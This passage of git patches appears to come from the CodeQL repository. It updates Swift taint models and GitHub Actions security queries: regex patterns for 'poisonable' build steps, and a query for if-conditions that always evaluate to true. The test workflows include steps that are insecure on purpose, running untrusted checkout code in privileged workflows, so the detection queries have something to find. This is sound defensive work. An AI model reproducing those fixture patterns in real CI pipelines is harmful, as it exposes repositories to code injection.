tainted=565 | | string.swift:587:27:588:1 | // $ tainted=565\n | Missing result: tainted=565 | | string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | From 954fbc44bff03f5a8c8d9148189042724b82da0a Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 16:03:24 +0000 Subject: [PATCH 0676/1267] Swift: Update prefix / suffix models for Swift 6. --- .../codeql/swift/frameworks/StandardLibrary/Collection.qll | 4 ++++ .../dataflow/taint/libraries/TaintInline.expected | 2 -- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index 6a5b1bdb777..fe229de028e 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll @@ -49,6 +49,10 @@ private class CollectionSummaries extends SummaryModelCsv { ";BidirectionalCollection;true;popLast();;;Argument[-1];ReturnValue;taint", ";BidirectionalCollection;true;reversed();;;Argument[-1];ReturnValue;taint", ";BidirectionalCollection;true;reversed();;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";BidirectionalCollection;true;suffix(_:);;;Argument[-1];ReturnValue;taint", + ";BidirectionalCollection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";BidirectionalCollection;true;suffix(from:);;;Argument[-1];ReturnValue;taint", + ";BidirectionalCollection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1];Argument[0].Parameter[0].CollectionElement;taint", ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[-1].CollectionElement;Argument[0].Parameter[0].CollectionElement;value", ";MutableCollection;true;withContiguousMutableStorageIfAvailable(_:);;;Argument[0].Parameter[0].CollectionElement;Argument[-1].CollectionElement;value", diff --git a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected index 0953cc40f2b..bbe166c67ca 100644 --- a/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected +++ b/swift/ql/test/library-tests/dataflow/taint/libraries/TaintInline.expected @@ -1,8 +1,6 @@ testFailures | optionset.swift:60:49:61:1 | // $ tainted=60\n | Missing result: tainted=60 | | optionset.swift:65:58:66:1 | // $ tainted=65\n | Missing result: tainted=65 | -| string.swift:586:19:587:1 | // $ tainted=565\n | Missing result: tainted=565 | -| string.swift:587:27:588:1 | // $ tainted=565\n | Missing result: tainted=565 | | string.swift:599:35:600:1 | // $ tainted=599\n | Missing result: tainted=599 | | string.swift:605:30:606:1 | // $ tainted=605\n | Missing result: tainted=605 | failures From f3ea75d27c79da66df470f47a9ca7ba97d684ad6 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 15:22:10 +0000 Subject: [PATCH 0677/1267] Swift: Further modelling updates / gap filling that doesn't seem to affect tests. --- .../frameworks/StandardLibrary/Collection.qll | 15 +++++++++++++++ .../swift/frameworks/StandardLibrary/String.qll | 8 +++++++- 2 files changed, 22 insertions(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll index fe229de028e..2d1c83d0c81 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/Collection.qll @@ -15,20 +15,35 @@ private class CollectionSummaries extends SummaryModelCsv { row = [ ";Collection;true;prefix(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;prefix(through:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(through:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;prefix(upTo:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(upTo:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;prefix(while:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;prefix(while:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;suffix(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;suffix(from:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;suffix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;dropFirst(_:);;;Argument[-1];ReturnValue;taint", ";Collection;true;dropFirst(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;dropLast(_:);;;Argument[-1];ReturnValue;taint", ";Collection;true;dropLast(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;flatMap(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;flatMap(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;map(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;map(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";Collection;true;split(maxSplits:omittingEmptySubsequences:whereSeparator:);;;Argument[-1];ReturnValue;taint", ";Collection;true;split(separator:maxSplits:omittingEmptySubsequences:);;;Argument[-1];ReturnValue;taint", ";Collection;true;removeFirst();;;Argument[-1];ReturnValue;taint", ";Collection;true;popFirst();;;Argument[-1];ReturnValue;taint", ";Collection;true;randomElement();;;Argument[-1].CollectionElement;ReturnValue.OptionalSome;value", + ";Collection;true;randomElement(using:);;;Argument[-1].CollectionElement;ReturnValue.OptionalSome;value", + ";Collection;true;trimmingPrefix(_:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;trimmingPrefix(_:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", + ";Collection;true;trimmingPrefix(while:);;;Argument[-1];ReturnValue;taint", + ";Collection;true;trimmingPrefix(while:);;;Argument[-1].CollectionElement;ReturnValue.CollectionElement;value", ";RangeReplaceableCollection;true;init(_:);;;Argument[0];ReturnValue.CollectionElement;taint", ";RangeReplaceableCollection;true;init(_:);;;Argument[0].CollectionElement;ReturnValue.CollectionElement;value", ";RangeReplaceableCollection;true;init(repeating:count:);;;Argument[0];ReturnValue.CollectionElement;value", diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll index eae5f78bb7f..e04feacf025 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll @@ -167,12 +167,18 @@ private class StringFieldsInheritTaint extends TaintInheritingContent, "precomposedStringWithCompatibilityMapping", "removingPercentEncoding" ] or - namedTypeDecl.getFullName() = "CustomStringConvertible" and + namedTypeDecl.getFullName() = ["CustomStringConvertible"] and fieldDecl.getName() = "description" or namedTypeDecl.getFullName() = "CustomDebugStringConvertible" and fieldDecl.getName() = "debugDescription" or + namedTypeDecl.getFullName() = "CustomTestStringConvertible" and + fieldDecl.getName() = "testDescription" + or + namedTypeDecl.getFullName() = "CustomURLRepresentationParameterConvertible" and + fieldDecl.getName() = "urlRepresentationParameter" + or namedTypeDecl.getFullName() = "Substring" and fieldDecl.getName() = "base" ) and From 24c4e87f44203b3a0f1338dee746256b1006e066 Mon Sep 17 00:00:00 2001 From: Geoffrey White <40627776+geoffw0@users.noreply.github.com> Date: Fri, 1 Nov 2024 16:30:15 +0000 Subject: [PATCH 0678/1267] Swift: Fix stray []. --- swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll index e04feacf025..b773177f152 100644 --- a/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll +++ b/swift/ql/lib/codeql/swift/frameworks/StandardLibrary/String.qll @@ -167,7 +167,7 @@ private class StringFieldsInheritTaint extends TaintInheritingContent, "precomposedStringWithCompatibilityMapping", "removingPercentEncoding" ] or - namedTypeDecl.getFullName() = ["CustomStringConvertible"] and + namedTypeDecl.getFullName() = "CustomStringConvertible" and fieldDecl.getName() = "description" or namedTypeDecl.getFullName() = "CustomDebugStringConvertible" and From ea20e9b33702be6a499b992c5f534e425d4cfcf8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:20 +0100 Subject: [PATCH 0679/1267] fix: Add versioned python binaries to poisonable steps --- ql/lib/ext/config/poisonable_steps.yml | 6 +++--- .../Security/CWE-829/.github/workflows/test4.yml | 1 + .../Security/CWE-829/.github/workflows/test7.yml | 1 + .../Security/CWE-829/UntrustedCheckoutCritical.expected | 9 ++++++--- 4 files changed, 11 insertions(+), 6 deletions(-) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index e32bc48a983..2f03b94b402 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -47,8 +47,8 @@ extensions: - ["poetry"] - ["pylint"] - ["pytest"] - - ["python\\s+-m\\s+pip\\s+install\\s+-r"] - - ["python\\s+-m\\s+pip\\s+install\\s+--requirement"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+--requirement"] - ["rake"] - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] @@ -69,7 +69,7 @@ extensions: - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] - - ["(python)\\s+([^\\s]+)\\.py\\b", 2] + - ["(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b", 2] - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index a07f2922fd7..f82f493cd6e 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -44,3 +44,4 @@ jobs: uses: actions/upload-pages-artifact@v1 with: path: './workspaces/www/build' + - run: python2.7 foo.py diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 44f5602ee06..7466cb4435d 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -56,3 +56,4 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash + - run: python2.7 foo.py diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85c2529c54c..ec3841c2384 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -189,7 +189,8 @@ edges | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:47:4 | Uses Step | +| .github/workflows/test4.yml:43:7:47:4 | Uses Step | .github/workflows/test4.yml:47:7:47:28 | Run Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | @@ -202,7 +203,8 @@ edges | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:59:9:59:30 | Run Step | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | @@ -342,7 +344,8 @@ edges | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | pull_request_target | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:59:6 | Run Step: benchmark-pr | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test7.yml:59:9:59:30 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:59:9:59:30 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | issue_comment | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | pull_request_target | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | issue_comment | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Potential execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | workflow_run | From 80f2b24eebe308d7042405ac3b18478097aa69f6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 3 Nov 2024 22:29:50 +0100 Subject: [PATCH 0680/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index d087f03b152..d34dad6665c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.83 +version: 0.1.84 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 073ddf5b457..007c2ebbe95 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.83 +version: 0.1.84 groups: [actions, queries] suites: codeql-suites extractor: javascript From db6f174b79161f1197d95d94864b6f323f20a7de Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Nov 2024 10:10:47 +0100 Subject: [PATCH 0681/1267] query: split if expression is always true query critical - if the if statement contains a known control check high - otherwise --- ...e.md => ExpressionIsAlwaysTrueCritical.md} | 0 ...e.ql => ExpressionIsAlwaysTrueCritical.ql} | 17 ++- .../CWE-571/ExpressionIsAlwaysTrueHigh.md | 63 ++++++++++ .../CWE-571/ExpressionIsAlwaysTrueHigh.ql | 29 +++++ .../.github/workflows/{test.yml => test1.yml} | 2 +- .../CWE-571/.github/workflows/test2.yml | 111 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.expected | 11 -- .../CWE-571/ExpressionIsAlwaysTrue.qlref | 1 - .../ExpressionIsAlwaysTrueCritical.expected | 11 ++ .../ExpressionIsAlwaysTrueCritical.qlref | 1 + .../ExpressionIsAlwaysTrueHigh.expected | 11 ++ .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 1 + 12 files changed, 236 insertions(+), 22 deletions(-) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.md => ExpressionIsAlwaysTrueCritical.md} (100%) rename ql/src/Security/CWE-571/{ExpressionIsAlwaysTrue.ql => ExpressionIsAlwaysTrueCritical.ql} (51%) create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql rename ql/test/query-tests/Security/CWE-571/.github/workflows/{test.yml => test1.yml} (97%) create mode 100644 ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected delete mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrueHigh.qlref diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md similarity index 100% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.md diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql similarity index 51% rename from ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql rename to ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql index 58eab4c6022..6eaaca6e05d 100644 --- a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.ql +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueCritical.ql @@ -1,27 +1,26 @@ /** - *: - * * @name If expression always true * @description Expressions used in If conditions with extra spaces are always true. * @kind problem * @security-severity 9.0 * @problem.severity error - * @precision high - * @id actions/if-expression-always-true + * @precision very-high + * @id actions/if-expression-always-true/critical * @tags actions * maintainability * external/cwe/cwe-275 */ import actions +import codeql.actions.security.ControlChecks -from If i +from ControlCheck i where - i.getCondition().matches("%${{%") and + i.(If).getCondition().matches("%${{%") and ( - not i.getCondition().matches("${{%") or - not i.getCondition().matches("%}}") + not i.(If).getCondition().matches("${{%") or + not i.(If).getCondition().matches("%}}") ) or - count(i.getCondition().splitAt("${{")) > 2 + count(i.(If).getCondition().splitAt("${{")) > 2 select i, "Expression always evaluates to true" diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md new file mode 100644 index 00000000000..1e7ea120cba --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.md @@ -0,0 +1,63 @@ +# If Condition Always Evaluates to True + +## Description + +GitHub Workflow Expressions (`${{ ... }}`) used in the `if` condition of jobs or steps must not contain extra characters or spaces. Otherwise, the condition is invariably evaluated to `true`. + +When an `if` condition erroneously evaluates to `true`, unintended steps may be executed, leading to logic bugs and potentially exposing parts of the workflow designed to run only in secure scenarios. This behavior subverts the intended conditional logic of the workflow, leading to potential security vulnerabilities and unintentional consequences. + +## Recommendation + +To avoid the vulnerability where an `if` condition always evaluates to `true`, it is crucial to eliminate any extra characters or spaces in your GitHub Actions expressions: + +1. Do not use `${{` and `}}` for Workflow Expressions in `if` conditions. +2. Avoid multiline or spaced-out conditional expressions that might inadvertently introduce unwanted characters or formatting. +3. Test the workflow to ensure the `if` conditions behave as expected under different scenarios. + +## Examples + +### Correct Usage + +1. Omit `${{` and `}}` in `if` conditions: + + ```yaml + if: steps.checks.outputs.safe_to_run == true + if: |- + steps.checks.outputs.safe_to_run == true + if: | + steps.checks.outputs.safe_to_run == true + ``` + +2. If using `${{` and `}}` Workflow Expressions, ensure the `if` condition is formatted correctly without extra spaces or characters: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run == true }} + if: |- + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +### Incorrect Usage + +1. Do not mix Workflow Expressions with un-delimited expressions: + + ```yaml + if: ${{ steps.checks.outputs.safe_to_run }} == true + ``` + +2. Do not include trailing new lines or spaces: + + ```yaml + if: | + ${{ steps.checks.outputs.safe_to_run == true }} + if: > + ${{ steps.checks.outputs.safe_to_run == true }} + if: " ${{ steps.checks.outputs.safe_to_run == true }}" + if: |+ + ${{ steps.checks.outputs.safe_to_run == true }} + if: >+ + ${{ steps.checks.outputs.safe_to_run == true }} + ``` + +## References + +- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173) diff --git a/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql new file mode 100644 index 00000000000..6b0c6997761 --- /dev/null +++ b/ql/src/Security/CWE-571/ExpressionIsAlwaysTrueHigh.ql @@ -0,0 +1,29 @@ +/** + * @name If expression always true + * @description Expressions used in If conditions with extra spaces are always true. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 7.5 + * @id actions/if-expression-always-true/high + * @tags actions + * maintainability + * external/cwe/cwe-275 + */ + +import actions +import codeql.actions.security.ControlChecks + +from If i +where + not i instanceof ControlCheck and + ( + i.getCondition().matches("%${{%") and + ( + not i.getCondition().matches("${{%") or + not i.getCondition().matches("%}}") + ) + or + count(i.getCondition().splitAt("${{")) > 2 + ) +select i, "Expression always evaluates to true" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml similarity index 97% rename from ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml rename to ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml index 4ed45ff973e..bbbcc5aaa79 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test1.yml @@ -91,7 +91,7 @@ jobs: if: ${{ github.event_name }} == 'foo' run: echo "Test 18 should not be printed" - name: Test 19 - if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.foo )}} || github.event_name == 'foo' run: echo "Test 19 should not be printed" - name: Test 20 if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml new file mode 100644 index 00000000000..8b863037e29 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test2.yml @@ -0,0 +1,111 @@ +name: Event + +on: + workflow_dispatch: + +jobs: + if-tests: + runs-on: ubuntu-latest + permissions: {} + steps: + - name: Test 1 + if: github.actor == "foo" + run: echo "Test 1 should not be printed" + - name: Test 2 + if: | + ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 2 should not be printed" + - name: Test 3 + if: ${{ github.actor == "foo" }} + run: echo "Test 3 should not be printed" + - name: Test 4 + if: ${{ github.actor == "foo" }} + run: echo "Test 4 should not be printed" + - name: Test 5 + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + run: echo "Test 5 should not be printed" + - name: Test 6 + if: ${{ 1 == 1 }} ${{ github.actor == "foo" }} + run: echo "Test 6 should not be printed" + - name: Test 7 + run: echo "Test 7 should not be printed" + if: ${{ + github.actor == "foo" || + 3 == 4 + }} + + - name: Test 8 + run: echo "Test 8 should not be printed" + if: > + ${{ + github.actor == "foo" || + 3 == 4 }} + - name: Test 9 + if: '${{ github.actor == "foo" }}' + run: echo "Test 9 should not be printed" + - name: Test 10 + if: "${{ github.actor == 111 }}" + run: echo "Test 10 should not be printed" + - name: Test 11 + if: " ${{ github.actor == 111 }}" + run: echo "Test 11 should not be printed" + - name: Test 12 + if: " ${{ github.actor == 111 }}" + run: echo "Test 12 should not be printed" + - name: Test 13 + if: | + github.actor == "foo" || + 3 == 4 + run: echo "Test 13 should not be printed" + - name: Test 14 + if: >- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 14 should not be printed" + - name: Test 15 + if: |- + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 15 should not be printed" + - name: Test 16 + if: |+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 16 should not be printed" + - name: Test 17 + if: >+ + ${{( + false || github.actor == "foo" + )}} + run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.actor }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ github.actor }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.actor == 'foo' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected deleted file mode 100644 index d4c16131cc2..00000000000 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ /dev/null @@ -1,11 +0,0 @@ -| .github/workflows/test.yml:15:13:19:13 | \| | Expression always evaluates to true | -| .github/workflows/test.yml:34:13:34:39 | ${{ 1 = ... == 2 }} | Expression always evaluates to true | -| .github/workflows/test.yml:45:13:48:24 | > | Expression always evaluates to true | -| .github/workflows/test.yml:56:15:56:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | -| .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | -| .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | -| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | -| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | -| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | -| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.qlref 